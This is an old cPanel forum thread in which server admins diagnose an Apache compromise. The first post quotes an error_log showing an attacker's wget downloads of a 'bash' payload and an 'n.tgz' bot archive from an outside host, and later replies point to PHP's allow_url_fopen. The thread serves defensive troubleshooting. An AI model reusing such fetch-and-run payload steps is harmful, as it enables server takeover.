Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Attacks agains Apache in error_log

Discussion in 'EasyApache' started by carock, Aug 22, 2005.

  1. carock

    carock Well-Known Member

    Joined:
    Sep 25, 2002
    Messages:
    254
    Likes Received:
    5
    Trophy Points:
    168
    Location:
    St. Charles, MO
    I'm trying to fingure out how my box is being attacked. I'm looking the the Apache error_log and I find entries like this every once in a while...

    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/images/form.5B4jpg
    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
    --08:11:31-- http://wget/
    => `index.html'
    Resolving wget... failed: Host not found.
    --08:11:31-- http://members.lycos.co.uk/icetriton/bash
    => `bash'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 18,649 [text/plain]

    0K .......... ........ 100% 56.38 KB/s

    08:11:32 (56.38 KB/s) - `bash' saved [18649/18649]


    FINISHED --08:11:32--
    Downloaded: 18,649 bytes in 1 files
    sh: line 1: ./bash: Permission denied
    sh: line 1: cd: /var/spool/samba: No such file or directory
    sh: line 1: lwget: command not found
    tar (child): n.tgz: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error exit delayed from previous errors
    sh: line 1: cd: bot: No such file or directory
    [Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/images/rollovers/sun$
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/news/1999/0425-amiga.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/404.shtml
    --08:22:01-- http://members.lycos.co.uk/icetriton/n.tgz
    => `n.tgz'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 217,288 [text/plain]

    0K .......... .......... .......... .......... .......... 23% 80.65 KB/s
    50K .......... .......... .......... .......... .......... 47% 318.47 KB/s
    100K .......... .......... .......... .......... .......... 70% 314.47 KB/s
    150K .......... .......... .......... .......... .......... 94% 337.84 KB/s
    200K .......... .. 100% 1.70 MB/s

    08:22:03 (194.50 KB/s) - `n.tgz' saved [217288/217288]

    sh: line 1: ./bash: Permission denied
    -----------------------------------------------------------
    and so on.

    The wierd thing is all the regular log entries in the middle. There's no request or source IP's logged, so I don't know where to go to findout how this person is getting files to upload on the server.

    Anyone deal with this before? I have Apache 1.3.33 and WHM 10.1.0 cPanel 10.2.0-S83 on RedHat 9

    Thanks,
    Chuck
     
  2. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    151
    I have the same errors right now

    I have the same errors right now.
    I found that it is a issue of OpenSSL.
    For attacer is possible to gain a shell.
    The attacer usually save the file to /tmp or /var/tmp directory.
    He ussually runs some 'bot' scripts for IRC, DCC, ...

    I have CentOS 3 and I'm going to reinstall my box to Fedora Core 4.
    CentOS does not provide the OpenSSL updates.
    Also I think will be the same with Fedora 4, but I'll try to build OpenSSL from source
    so later I can easily patch it.

    Roman
     
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    4
    Trophy Points:
    193
    Location:
    Minneapolis, MN
    What did you do to secure your server? Do you have system based firewall including Mod Security, Mod Evasive, APF and BFD? Are they confgiured properly and have a very good set of rules?

    Do you see any unusual server load?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    151
    I have just APF

    I have just APF installed.
    This is the versions on my box

    Apache 1.3.34

    OpenSSL 0.9.7a

    PHP 4.4.2
     
  5. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    151
    Found a solution

    It is quite known bug in PHP.
    to solve this I had to set allow_url_fopen = Off in php.ini
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice